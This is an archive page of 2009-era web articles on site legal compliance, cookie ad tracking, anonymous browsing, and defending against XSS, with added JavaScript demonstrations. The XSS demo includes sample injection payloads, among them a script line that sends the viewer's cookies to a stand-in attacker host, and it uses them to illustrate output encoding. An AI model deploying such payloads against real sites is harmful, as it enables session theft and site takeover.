Archive for Website Security

2009 Resolution — Give Your Site a 10-Point Legal Check-Up

It’s early in the year, and it’s time to fulfill your resolution to give your site a quick legal check-up.

Online businesses are now highly regulated, and there’s substantial liability if your site’s not legally compliant. In addition, your customers are becoming more Internet savvy, and a site that’s not legally compliant is not going to be trusted.

So, let’s get started.

Use This Checklist If You Already Have The Basic Site Documents In Place

1. Copyright Notice. Check Your Copyright Notice. Your copyright notice consists of the following elements: the word "copyright" or copyright symbol (c in a circle) followed by the year of first publication followed by the name of the copyright owner. It’s also a good idea to add "All rights reserved worldwide". Example: Copyright 1996-09 Digital Contracts, Inc. All rights reserved worldwide. Note that if you update your site from time to time, you should add a date range reflecting the fact that the site has been updated each year within the date range. If you haven’t updated yet for 2009, do it now.

2. Blogs, etc. Have you recently added a blog or any other functionality that permits visitors to post text or digital files to your site? Or, do you plan to do so as part of your marketing plans for 2009? If so, you need to have a DMCA notice in your Terms of Use and you also need to file a DMCA Registration form with the U.S. Copyright Office. These steps will create a "safe harbor" from strict liability for copyright infringement if a site visitor posts infringing material to your site.

3. Personal Information. Do you collect personal information from site visitors? If so, review your Privacy Policy to make sure that you identify all of the categories of personal information you collect and the way in which you share this personal information. If you’ve changed these policies since you posted your Privacy Policy, amend it now… without delay.

4. Data Security. Check your data security measures. If you collect personal information, you are required to implement "reasonable and appropriate" data security measures. These measures are essentially moving targets since data security technology evolves at a relatively rapid pace. What may have been "reasonable and appropriate" a couple of years ago may not pass muster today. Update your security procedures, if necessary.

5. Future Sale of Your Business? If your online business is starting to be successful and generate positive revenue, have you ever considered that you might want to sell it for a profit in the future? If so, be sure that your Privacy Policy specifies that personal information collected may be transferred and shared in the event of a sale. If you don’t do this prior to collecting personal information, you won’t be able to pass it on to your purchaser. The Federal Trade Commission (FTC) stipulated in recent settlements that personal information collected prior to posting this notice in your Privacy Policy will not be transferable in the event of a sale. And this personal information (your opt-in lists and customer lists) is the real value of your online business.

6. Service Providers. Do you use service providers to provide hosting, site maintenance, SEO services, or other site functions where they have access to your server? If you don’t collect personal information, your answer to this question is immaterial, but if you do (an email address alone counts), you need to enter into privacy and security agreements with your service providers. The FTC stipulated in a couple of recent settlements that you would be liable if you don’t.

7. Registration Agreement. Does your site require site visitors to register for certain benefits such as a membership or subscription rights? If so, you need an electronic agreement (a so-called "click-wrapped" agreement where the user clicks on "I ACCEPT"). Your agreement should be presented conspicuously in the registration process and it should require an affirmative act (clicking on "I ACCEPT") to complete the registration. You also need to be sure that all of your warranty disclaimers and limitations of liability pass muster.

8. Collect Birth Dates? Do you collect the date of birth as part of your registration process? If so, and if this date indicates that children under 13 are registering, you will be liable for substantial damages under the Children’s Online Privacy Protection Act (COPPA) if you do not comply with COPPA’s stringent requirements. You should either modify your information collection practices or comply with COPPA, or both.

9. Creditor Under FACTA? Do your registered users make periodic payments payable as monthly or quarterly installments, or do you extend credit so that payment is made after receipt of the product or service? If so, you fall within the statutory requirements of the Fair and Accurate Credit Transactions Act of 2003 (FACTA). FACTA requires that you adopt a "Red Flag" Identity Theft Policy before May 1, 2009, or face substantial liability.

10. Sales Intermediaries? Do you use affiliates or resellers? If so, a recent New York case illustrates that you may be liable for their actions if they violate certain laws acting on your behalf. For example, are your affiliates engaged in illegal spamming activities? If they are offering their own end user license agreements, do they properly disclose certain activities such as the use of pop-up ads? You should check your affiliate and reseller agreements and modify them, if required.

Use This Checklist If You Don’t Have Your Site Documents In Place

You may be just starting your online business, or you may have procrastinated a little with your website legal compliance. If you fall into this group, you should get started without delay.

I’ve developed a procedure that will help you determine the correct mix of legal compliance documents for your site. Part of it is set out below.

First, if your site does not collect personal information, you should consider these documents:

  • a Legal page for your intellectual property notices; and
  • Terms of Use.
  • And if you allow site visitors to post text or digital files to your site (for example via a blog, forum, or chat room), you’ll need a DMCA Registration Form (see No. 2 above).

Second, if your site collects personal information, but does not require registration to open an account or to use or purchase a product or service, you should consider these additional documents:

  • Privacy Policy.
  • And if you have service providers that have possession of your server or have access rights to it, you’ll need a privacy-security agreement for these service providers (see No. 6 above).

Third, if your site requires registration to open an account or to use or purchase a product or service, you should consider in addition to the foregoing documents, a customer agreement such as:

  • a software as a service (SaaS) agreement; and/or
  • a Software License Agreement (for software downloads).
  • And if you are regulated by FACTA (see No. 9 above), you’ll need a Red Flag Identity Theft Policy — before the May 1, 2009 deadline.

Conclusion

The checklists provided above are not exhaustive. However, they should point you in the right direction as you give your site a new year’s legal compliance check-up.

A simple check-up — and remedial action if necessary — is one of the best investments you can make in your online business.

About The Author
Chip Cooper is a leading intellectual property, software, and Internet attorney who’s advised software and online businesses nationwide for 25+ years.

Cookies: Who Is Watching You?

Have you ever been surfing the web and come upon Internet advertising that provides a direct solution for something that you’ve been researching lately? Did you think that it might be related to your computer cookies, or did you chalk it up to serendipity?

The fact is, it almost certainly wasn’t a coincidence. Behavior-based Internet advertising is a relatively new and very powerful way for advertisers to get their message in front of potential buyers that they know to be qualified. The question is, how do they know that the surfer is qualified?

The advertisers know this because the Internet advertising network is tracking the surfers’ online activity. With tracking, advertisers know what sites you like. They know what searches you make. They have profiled you, and, unlike in real life, profiling on the web is AOK — so far.

Check Your Computer for Cookies

Before we get into the legal issues involved, perhaps a further definition of the technology is in order. Most (but not all) behavioral Internet advertising is based on computer "cookies." A cookie is a small piece of text that a website asks your browser to store and to send back on every later request to that same site. In the simplest form, you go to a web page. A placeholder on that page, the blank spot reserved for a banner ad, loads the banner from an advertising network’s server, and that request carries two things: whatever cookie the network set on an earlier visit to any other page carrying its ads, and the address of the page you are reading now. The network cannot read other sites’ cookies or rummage through your computer; it doesn’t need to, because its own cookie comes back to it from every site that embeds its ads. Over time it links those page views into a profile of your likes and dislikes, and instead of serving up just any banner ad, it feeds you Internet advertising chosen from that profile of your online behavior.
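The mechanism just described, as an added example that is not part of the original article: a small Node.js simulation in which an ad network recognizes one visitor across two unrelated sites through a single cookie, and fails to do so for a visitor whose browser refuses third-party cookies. The hostnames, the `uid` cookie name and the site-to-interest table are all made up for the illustration.

```javascript
// Added example (not from the original article): a self-contained simulation
// of cookie-based behavioral advertising. The hostnames, the cookie name and
// the site-to-interest table are constructed for illustration.

const AD_HOST = "ad.example-network.net"; // the ad network's own domain

// What the network infers from each publisher site carrying its banners
// (constructed; a real network derives this from page content and keywords).
const SITE_INTEREST = { "puppies.example.com": "pets", "fishing-gear.example.com": "outdoors" };

function parseCookieHeader(header) {
  const cookies = {};
  for (const part of (header || "").split(";")) {
    const [name, ...rest] = part.trim().split("=");
    if (name) cookies[name] = rest.join("=");
  }
  return cookies;
}

// A minimal browser cookie jar. Cookies are kept per host and sent back only
// to the host that set them, so the ad network never sees the publisher's
// cookies; it only needs its own. `blockThirdParty` models the browser
// setting that refuses cookies from any host other than the page being viewed.
class Browser {
  constructor({ blockThirdParty = false } = {}) {
    this.jar = new Map(); // host -> { name: value }
    this.blockThirdParty = blockThirdParty;
  }
  cookieHeaderFor(host) {
    return Object.entries(this.jar.get(host) || {}).map(([k, v]) => `${k}=${v}`).join("; ");
  }
  storeCookie(host, setCookieHeader, isThirdParty) {
    if (!setCookieHeader || (isThirdParty && this.blockThirdParty)) return;
    const [name, value] = setCookieHeader.split(";")[0].split("=");
    const cookies = this.jar.get(host) || {};
    cookies[name] = value;
    this.jar.set(host, cookies);
  }
}

// The ad network's server. On each banner request it sees just two things:
// its own `uid` cookie (if any) and the Referer, i.e. the page embedding the ad.
class AdNetwork {
  constructor() {
    this.profiles = new Map(); // uid -> { sites: Set, interests: { name: count } }
    this.nextId = 1;
  }
  handleAdRequest({ cookieHeader, referer }) {
    let uid = parseCookieHeader(cookieHeader).uid;
    const responseHeaders = {};
    if (!uid) { // first contact: hand out an identifier that will come back from every site
      uid = `u${this.nextId++}`;
      responseHeaders["Set-Cookie"] = `uid=${uid}; Path=/; Max-Age=31536000`;
    }
    const site = new URL(referer).hostname;
    const profile = this.profiles.get(uid) || { sites: new Set(), interests: {} };
    profile.sites.add(site);
    const interest = SITE_INTEREST[site];
    if (interest) profile.interests[interest] = (profile.interests[interest] || 0) + 1;
    this.profiles.set(uid, profile);
    return { uid, ad: this.chooseAd(profile), responseHeaders };
  }
  chooseAd(profile) { // serve the visitor's strongest interest, or a generic ad
    const ranked = Object.entries(profile.interests).sort((a, b) => b[1] - a[1]);
    return ranked.length ? `${ranked[0][0]}-ad` : "generic-ad";
  }
}

// One page view: the browser loads pageUrl, whose banner slot fetches an ad
// from AD_HOST. That fetch carries AD_HOST's cookies and pageUrl as Referer.
function visitPage(browser, network, pageUrl) {
  const res = network.handleAdRequest({ cookieHeader: browser.cookieHeaderFor(AD_HOST), referer: pageUrl });
  browser.storeCookie(AD_HOST, res.responseHeaders["Set-Cookie"], true);
  return res;
}

// Two visitors read the same pages; one accepts third-party cookies, one blocks them.
function demo() {
  const network = new AdNetwork();
  const tracked = new Browser();
  visitPage(tracked, network, "https://puppies.example.com/breeds");
  visitPage(tracked, network, "https://puppies.example.com/food");
  const onNews = visitPage(tracked, network, "https://news.example.com/");

  const blocking = new Browser({ blockThirdParty: true });
  const first = visitPage(blocking, network, "https://puppies.example.com/breeds");
  const blockedOnNews = visitPage(blocking, network, "https://news.example.com/");

  return {
    trackedAdOnNews: onNews.ad,            // "pets-ad": the uid followed the visitor to the news site
    trackedSites: [...network.profiles.get(onNews.uid).sites],
    blockedAdOnNews: blockedOnNews.ad,     // "generic-ad": no cookie came back, nothing to link
    blockedGotNewId: first.uid !== blockedOnNews.uid,
  };
}
```

The point to notice is that the news site never tells the network anything; the `Referer` on the banner request and the network’s own `uid` cookie are enough to carry the puppy-site visits over. Refusing third-party cookies breaks the link because the network is issued a fresh `uid` every time and can never match the visits up.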

For some people, this is no big deal. They like Internet advertising to be targeted toward them, and they don’t mind computer cookies. For others, it’s a little Orwellian and creepy. This leads us to the great debate.

Opt-in or Opt-out?

One big question to be resolved is whether ultimately this type of Internet advertising will be "opt-in" (meaning that a user has to sign up in order to receive targeted ads) or "opt-out" (meaning that a user will receive targeted ads unless they specifically ask not to).

It shouldn’t surprise anyone to know which side the advertisers are on. If governmental regulators eventually require that all Internet advertising be "opt-in", the industry will be severely restricted. My guess is that it would relegate behavior-based Internet advertising to a fringe player in the online marketing world.

The privacy advocates, naturally, are on the other side of the fence. The vast majority of people assume that their online activity is not being tracked, they say. Why should they have to take a specific action in order to remove computer cookies and to not be tracked and profiled?

A Do Not Track List?

Recently, a group of nine consumer advocate groups proposed the idea of a "Do Not Track" list for Internet advertising, which would work in a similar fashion as the "Do Not Call" list works today. Naturally, this is an "Opt-out" scenario, but because of the attention that the formation of such a list would bring, it may be a suitable compromise between advertiser and advocate.

How to Prevent Being Tracked

It is fairly easy to prevent being tracked by advertisers. You simply prevent your machine from accepting computer cookies. Go to START, SETTINGS, CONTROL PANEL and click on INTERNET OPTIONS then the PRIVACY tab. (Note that these instructions are for Internet Explorer on a Windows XP system. Other browsers have an equivalent cookie setting under their privacy or preferences menu.) Slide the bar all the way to the top to where it says "Block All Cookies." A less drastic option, under the Advanced button on the same tab, is to block third-party cookies while still accepting first-party ones; that stops most ad-network tracking without breaking the sites you log in to.

However, you should be aware that this change may limit your Internet experience. Some websites will not display properly (or at all) if you do not accept computer cookies. In my experience, at least one of the top five search engines will not work at all. Other engines have limited functionality when you block cookies.

Even if you do manage to turn off your computer cookies, don’t rest easy just yet.

The Newest Technology

Recently, it was announced that a Silicon Valley startup named NebuAd has created a new technology that does not require computer cookies. Under the NebuAd model, the company teams up directly with service providers and installs equipment directly at their facilities that allows them to track the behavior of individuals on the web, even if their machine does not accept computer cookies. This, of course, requires Internet Service Providers (ISPs) to embrace the new technology; naturally, they are given a piece of the Internet advertising revenue that is generated. Whether or not any of the major players embrace this technology will probably depend largely on public outcry, or lack thereof. Of course, if this does become the newest behavioral targeting standard, we will return again to the question of "Opt-in" or "Opt-out."

Conclusion

The future of this approach to Internet advertising is unclear, and will depend largely on public education and reaction. Will people see value in receiving targeted ads, even if it means that somewhere there is an "anonymous" profile of them sitting on a server? Will they feel outraged and push for a total ban? It’s hard to say.

Will this new approach be the death of the Internet as we know it? Probably not. But it should at least be interesting.

About The Author
Scott Buresh is the CEO of Medium Blue, which was recently named the number one search engine optimization company in the world by PromotionWorld. Scott has contributed content to many publications including Building Your Business with Google For Dummies (Wiley, 2004), MarketingProfs, ZDNet, WebProNews, DarwinMag, SiteProNews, ISEDB.com, and Search Engine Guide. Medium Blue serves local and national clients, including Boston Scientific, DS Waters, and Wake Forest University Baptist Medical Center. Visit MediumBlue.com to request a custom SEO guarantee based on your goals and your data.

Advice to Surf the Web Anonymously

So, let’s talk privacy, and then let’s talk about how you haven’t got any. That’s right, if you are surfing the Internet, and you aren’t doing it through some third party proxy server, the sites you surf to can potentially learn everything about you: your habits, your likes and dislikes, your buying preferences and more.

In this way, advertisers can serve up those annoying pop-up ads, spyware can quietly download to your computer in the background and track your every move, government agencies can watch you, and hackers can slither into your hard drive and steal your world.

Paranoid yet?

If you aren’t, re-read the opening to this article slowly. While you are reading it, remember an advertiser’s spyware could be phoning in your private information for future use as you read.

What is anonymous surfing? Remember the old punchline, “On the Internet, nobody knows you’re a dog?” Well, if you practice Anonymous Web Surfing 101, nobody will know whether you’re Fido, the family pet out looking for the latest craze in dog food or the parakeet looking for warmer climes.

But seriously folks, put simply, anonymous web surfing erases any trace or trail of where you’ve been or are going on the Internet.

Your private world remains private, and no one, not even your Internet Service Provider (the company you pay $20 to $40 a month to get on the Net), has a clue about who you are. This is how it used to be, and this is how it should be. Period. End of story.

Beyond simple paranoia, people have various reasons to surf anonymously ranging from general terror about losing their privacy to wanting to keep their personal surfing sites that they go to on the job away from the prying eyes of their employers.

Beyond the obvious, what are spy websites looking for, and how do they accomplish it? Websites use a variety of methods to gather intel, from the most basic, which is reading your IP address, to placing cookies on your computer.

Your IP address is where you started from, like your home street address. Cookies are little bits of information placed on your computer that keep track of your habits.

A familiar example is the "remember me" box on a website’s login form. If you tick it, the site stores a cookie holding a login token on your hard drive, and from then on, until that cookie expires or you clear your cookies, the site recognizes you and fills in your login automatically on every visit. (Internet Explorer’s own offer to remember usernames and passwords is a separate feature, AutoComplete, kept by the browser itself rather than in a cookie.)

Neat, huh? Well that’s okay. But what about the cookies that are downloaded that you don’t know about. That’s where the grey area of invasion of privacy comes in. That’s also where anonymous web surfing stops it dead in its tracks.

Sites use a variety of techniques to gather and collate this information, but the two most basic are examining your IP address and placing cookies on your PC. Matching your IP address with your cookies makes it easier for them to create personal profiles. If you’d like to see what kind of information sites can gather about you, head to these two sites, which peer into your browser and report what they find.

Analyze.Privacy.net gives a comprehensive report plus an introduction to privacy.net which shows you more about cookies, gives you a look at what others see when they look at your computer and more.

Browse Spy goes even deeper into your system and gives an eye-opening report on what’s on your system right down to the software you own.

Now that you know why you should surf anonymously and how easy it is for others to violate your privacy, how do you stop it? It’s actually easier than you might think.

There are a couple of software packages out there for anonymous surfing. I personally like Tor and Vidalia. It runs in the background through my Firefox settings, and while it slows down my surfing a little, I no longer have to wonder who’s virtually following me around taking notes. The Tor/Vidalia combination is a bit tricky to set up, so if you don’t need heavy-duty protection, you might want to select one of the packages listed below.

Like most anonymizers, it sends my traffic through a series of intermediate computers called proxy servers, which screen me from the websites I’m contacting.

My computer contacts a proxy server instead of the website directly. The website, in turn, doesn’t see me; it sees the proxy server’s IP address. Tor goes a step further by chaining several relays, so that no single relay sees both who you are and which site you are visiting, whereas a single proxy service necessarily sees both.

Proxy services also typically strip cookies, pop-ups and other web parasites before passing pages on to their clients. Two caveats apply to any of them, though: whoever runs the proxy can see everything that passes through it, so you are trusting the operator instead of the website; and anything you type into a site (a login, your name on an order form) identifies you regardless of which IP address the site sees.

Other programs that facilitate anonymous surfing include Guardster, SnoopBlocker, Mega Proxy and Anonymizer. My second favorite, Anonymizer, is recognized as the leader of the pack and is relatively simple to use.

It’s where I started before I got involved with servers and such, and is really good for web surfing protection.

Last, if you are at work and can’t load a bunch of stuff to your workstation, simply surf to http://www.the-cloak.com/anonymous-surfing-home.html. It’s web based, easy and with nothing to download, a real godsend. Give them a donation and you can log in and surf to your heart’s content.

It’s not the prettiest site to look at, but it is functional and it hasn’t yet failed me for fast cloaking.

The-Cloak works the same way as the others: a special computer, a proxy server, screens you from the websites you are contacting. Your computer contacts only the proxy server, which contacts the website for you, so the website sees only the proxy server and not you. In addition to hiding your IP address, a proxy server will usually block cookies, pop-ups and other annoying web parasites.

Services differ in how you reach them. With web-based ones like The-Cloak, you go to the anonymous service’s website and open your favorite website from there. With others, you download and install software which finds an anonymous server for you.
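The two sides of the picture painted above, what a site can read from a request and what a proxy does or does not hide, as an added example that is not part of the original article. It models the server’s view of one request in three situations: a direct connection, a transparent ("non-anonymous") proxy that relays your headers and appends `X-Forwarded-For`, and an anonymizing proxy that scrubs them. The IP addresses, proxy name and header values are constructed sample input; no real service’s behaviour is being quoted.

```javascript
// Added example (not from the original article): what a web server can learn
// from a single request, and what an anonymizing proxy does and does not hide.
// The addresses, proxy name and header values below are constructed sample input.

// Headers a proxy may add to disclose the client it is forwarding for. An
// anonymizing proxy omits them; a transparent ("non-anonymous") proxy adds
// them, handing the site your real address even though you went through a proxy.
const FORWARDING_HEADERS = ["x-forwarded-for", "x-real-ip", "forwarded", "via"];

function lowerCaseKeys(headers) {
  const out = {};
  for (const [k, v] of Object.entries(headers)) out[k.toLowerCase()] = v;
  return out;
}

// The site's view of one request: where the connection came from, the best
// guess at the original client, and whatever the browser volunteered in headers.
function whatTheSiteSees(remoteAddr, rawHeaders) {
  const h = lowerCaseKeys(rawHeaders);
  const forwardedFor = h["x-forwarded-for"] ? h["x-forwarded-for"].split(",")[0].trim() : null;
  return {
    connectingAddress: remoteAddr,
    originalAddress: forwardedFor || h["x-real-ip"] || remoteAddr,
    proxyDisclosed: FORWARDING_HEADERS.some((name) => name in h),
    browser: h["user-agent"] || null,
    language: h["accept-language"] || null,
    cameFrom: h["referer"] || null,      // the page (or search) that led you here
    cookieHeader: h["cookie"] || null,   // whatever this site stored on you earlier
  };
}

// What a proper anonymizing proxy does before forwarding a request: drop the
// cookies, the Referer and any forwarding headers, and flatten the User-Agent.
function anonymizeHeaders(rawHeaders) {
  const dropped = new Set(["cookie", "referer", ...FORWARDING_HEADERS]);
  const out = {};
  for (const [k, v] of Object.entries(lowerCaseKeys(rawHeaders))) if (!dropped.has(k)) out[k] = v;
  out["user-agent"] = "Mozilla/5.0 (anonymized)";
  return out;
}

// Constructed sample: the request a browser would send directly to the site.
const CLIENT_IP = "192.0.2.10";
const PROXY_IP = "198.51.100.7";
const BROWSER_HEADERS = {
  "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:1.9) Gecko/2008 Firefox/3.0",
  "Accept-Language": "en-US,en;q=0.8",
  Referer: "https://search.example.com/?q=dog+food",
  Cookie: "uid=u1; lastvisit=2009-01-05",
};

function compareScenarios() {
  // 1. No proxy: the site gets your address and everything in the headers.
  const direct = whatTheSiteSees(CLIENT_IP, BROWSER_HEADERS);
  // 2. Transparent proxy: the connection comes from the proxy, but it relays
  //    your headers untouched and appends X-Forwarded-For and Via.
  const transparent = whatTheSiteSees(PROXY_IP, {
    ...BROWSER_HEADERS,
    "X-Forwarded-For": CLIENT_IP,
    Via: "1.1 proxy.example.net",
  });
  // 3. Anonymizing proxy: the connection comes from the proxy and the headers are scrubbed.
  const anonymous = whatTheSiteSees(PROXY_IP, anonymizeHeaders(BROWSER_HEADERS));
  return { direct, transparent, anonymous };
}
```

The transparent case is the one to watch for when picking a service: the site’s logs still show the proxy as the connecting address, but `X-Forwarded-For` hands over the real one, and the Referer reveals what you searched for to get there. Only the scrubbed request leaves the site with nothing but the proxy’s address and a generic browser string.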

About The Author

Alojate.com is the premier web hosting company in Mexico, offering a range of services for all business needs.

Defend Against Black Hat SEO: Your Web Host Can Help

The world wide web is a dynamic, exciting place to launch a new business or promote your organization’s message. It’s also a lawless landscape in which black hats – crackers, hackers and other on-line evil doers – roam with very little oversight or law enforcement.

And that means it’s up to every site owner to ensure that his or her site is defended against intrusions, code injections and other forms of attack. There’s plenty of software to help keep hackers out of your desktop PC, but what about your hosting service? How can you protect server-based data?

Top-tier web hosting firms design proprietary hardware and software protection to ensure that your business is secure. But site security doesn’t stop with impenetrable firewalls, spam zappers and e-mail scanners. In fact, if you go with a hosting service that isn’t up to speed on the latest forms of hacker attacks, you could quickly find your site is no longer under your control!

Great hosts "harden" their server systems to deter and deflect known exploit points in the software the servers run and in any client site’s code! This is where the value of quality hosting comes into play.

XSS Attacks

XSS stands for cross-site scripting. Despite the name, it is not a hardware problem and it does not need a hole in your firewall: it is a flaw in the web application itself. Whenever a site takes text that a visitor supplied (a comment, a search term, a profile field) and writes it back into a page without encoding it, the visitor can supply text that the browser, and the search engine bot, treat as HTML or script. Because the injected markup is served from your own domain as part of your own page, it sails past the commonly employed security systems that only watch the network. This is how XSS poses a threat to even the most secure sites. In an XSS attack, black hats inject malicious HTML or script into site pages of other domains. They do this for two reasons.

First, in some instances, black hats inject undetected scripting into competitor sites to taint these sites when SE bots spider them. Imagine, a competitor is able to access your site’s code, insert invisible text (at least invisible to you) and, when an SE bot discovers this invisible text, your site is slammed. Even banned from Google. Don’t think it can happen? It closes down on-line businesses daily.

So what kind of attacks can be “planted” on your site? There are plenty:

Redirects take visitors to another site as soon as they reach yours.

Overloading alt tags, meta tags and other interior coding with keywords, sometimes called keyword stuffing.

Inaccurate or misleading keywords inserted within site pages.

Cloaking, which detects search engine spiders and changes site text to improve PR.

Pagejacking, the practice of stealing site content, can not only cost you in sales, it can also slam your PR because your content isn’t "original" any longer.

Any of these black hat SEO tactics and more (spamglish, link farms, virus injections, etc.) can and will do severe, if not irreparable, damage to your on-line enterprise. Why?

SE Bots Are Brainless

SE spiders are dumber than a box of rocks. They’re unable to discern legitimate text from a malware injection. They rely, solely, on automation to assess and categorize a site. There’s no subjective analysis. Just text strings that are sorted completely by brainless bots.

A competitor using one of the injections listed above can "de-optimize" your site and make it appear that you are the one using black hat SEO tactics, or can use the same opening to reach further into the site through an ordinary web browser and inject toxic data that devalues your content.

Google Penalties For Black Hat Tactics

The purpose of any search engine is to deliver relevant, useful SERPs to users’ queries. So, when a Google bot discovers what it perceives as an attempt to falsely increase value, the site may suffer serious, site-threatening sanctions.

Some of these penalties may be imposed without you even knowing about it – until you discover that site revenues have dropped 75% in two days as a result of lost rankings and traffic! A site discovered to employ black hat SEO may be penalized in page rank, may lose PR altogether, may experience SE indexing issues (partial or mis-indexing, for example) and, for the worst offenders, banishment from the Google site altogether. Dead in the eyes of Google bots.

So, here’s the problem: without your knowledge, a black hat competitor can inject toxic script into your site that could, conceivably, get your site banned from Google. Even if you and your web host have all the firewall and intrusion detection protection there is.

It Gets Even Worse

The second reason black hats use cross-site scripting is to gain access to, and control of, your on-line business. Certain types of XSS attacks let a complete stranger act with the privileges reserved for the site owner – you. Script injected into a page that you view while logged in as the administrator can copy your session cookie to the attacker, or silently submit requests in your name, so that the attacker’s browser is treated by your site exactly as yours is.

Access to sensitive customer data, bank account information, the entire back office – all can be achieved with relative ease by a knowledgeable cracker looking to steal and plunder your site.

Whether the black hat is a competitor who wants to eliminate the competition, or a script-kiddie looking to clean out the till and sell some credit card numbers, your on-line business is at risk regardless of how much security you and your web host deploy.
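Both uses of an injection described in this article, the hidden-text and redirect payloads planted for SEO damage and the session theft that turns a visitor into the administrator, come from the same coding mistake, shown here as an added example that is not the article’s own code. A comment feature writes visitor text straight into the page; the hardened version encodes it, and the session cookie is flagged `HttpOnly` so that even a successful injection cannot read it. The attacker URLs and payload strings are made up for the illustration.

```javascript
// Added example (not the article's own code): a stored HTML injection through a
// comment feature, constructed payloads of the kinds the article describes, and
// the output-encoding and cookie-flag defenses. The attacker URLs are made up.

// VULNERABLE: visitor-supplied text is concatenated straight into the page.
function renderCommentUnsafe(comment) {
  return `<div class="comment"><b>${comment.author}</b>: ${comment.body}</div>`;
}

// Encode the five characters that can change meaning in an HTML text or
// attribute context. This is the fix: the browser (and the search bot) then
// sees the attacker's "<script>" as literal text, not as a tag.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// HARDENED: every untrusted value is encoded for the context it is written into.
function renderCommentSafe(comment) {
  return `<div class="comment"><b>${escapeHtml(comment.author)}</b>: ${escapeHtml(comment.body)}</div>`;
}

// Constructed payloads, one for each effect the article lists.
const PAYLOADS = {
  // hidden keyword stuffing: invisible to you, indexed by the crawler
  keywordStuffing: '<span style="display:none">cheap pills cheap pills cheap pills</span>',
  // redirect: sends every visitor elsewhere as soon as the page loads
  redirect: '<meta http-equiv="refresh" content="0;url=https://attacker.example/">',
  // session theft: ships the viewer's cookies (your admin session, if you are
  // the one reading the comment) to the attacker's server
  sessionTheft: '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>',
};

// Tag names present in a rendered fragment. The template itself contributes
// only "div" and "b"; anything beyond that came from the visitor.
function tagsIn(html) {
  const names = new Set();
  for (const m of html.matchAll(/<\/?([a-z][a-z0-9]*)/gi)) names.add(m[1].toLowerCase());
  return [...names].sort();
}
const TEMPLATE_TAGS = ["b", "div"];
function injectedTags(html) {
  return tagsIn(html).filter((t) => !TEMPLATE_TAGS.includes(t));
}

// Defense in depth for the session-theft case: a cookie flagged HttpOnly is not
// readable from document.cookie, so even a successful injection cannot ship it.
function sessionCookieHeader(token) {
  return `session=${token}; Path=/; HttpOnly; Secure`;
}

// Render each payload through both versions and report what markup survived.
function demo() {
  const result = {};
  for (const [name, body] of Object.entries(PAYLOADS)) {
    const comment = { author: "visitor", body };
    result[name] = {
      unsafe: injectedTags(renderCommentUnsafe(comment)),
      safe: injectedTags(renderCommentSafe(comment)),
    };
  }
  return result;
}
```

Run `demo()` and the unsafe renderer lets `span`, `meta` and `script` through for the three payloads respectively, while the hardened renderer lets nothing through: the same text is still shown to readers, but as text. Note that `escapeHtml` is correct for HTML text and quoted attribute values only; a value written into a URL, a `<script>` block or a CSS rule needs the encoding appropriate to that context.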

This Is Where Quality Web Hosting Enters

During the design, administration and growth of a web-based business, numerous tools and applications are used by site owners and designers. There’s site building software, email management software, a check-out, customer database, automated shipping apps, tools for developing site metrics and many others.

This software isn’t necessarily designed with security as Priority One. Often, there are openings in commonly-used ebiz software that are exploited by black hats during the execution of an XSS attack.

And, because of the nature of these attacks, system and server security measures can be breached because, in essence, the hackers piggyback their way onto an unsuspecting site using the site administrators’ credentials to gain access and/or control.

The first line of protection from XSS is in the application code itself: every piece of visitor-supplied text must be encoded for the place in the page it is written into, so that the browser and the search bot see it as text and not as markup, and session cookies should carry the HttpOnly flag so that injected script cannot read them. Beyond that, protection lies in the proper configuration of all of the applications and tools that comprise your on-line enterprise. These apps must be synced up to work together while, at the same time, being hardened against XSS attacks.

Much of this configuring is done at the host level. It should include keeping the shared software patched, a detailed analysis of potential XSS entry points within the site’s design, and reconfiguration to fit the server security already in place.

Go With The Host Who Knows

If your web hosting service isn’t familiar with the growing danger of XSS attacks based on application exploitation points, consider finding a more informed host.

It’s not a matter of securing your business system locally. And it’s not a matter of the multi-layers of protection offered by your web host.

It’s a matter of thinking like a black hat and taking a proactive stance against XSS attacks they may employ. If you aren’t sure your site is protected, and your hosting rep can’t provide the assurances you require, talk to another hosting company before disaster strikes and your site is banned from Google.

It’s that important.

About The Author
Frederick Townes is the owner of W3 Hosting, a web hosting company dedicated to providing fast servers, guaranteed uptime and reliable, friendly support. When your site is an important part of your business you need a professional web hosting company to keep it online and running smoothly. W3 Hosting is just that – and more.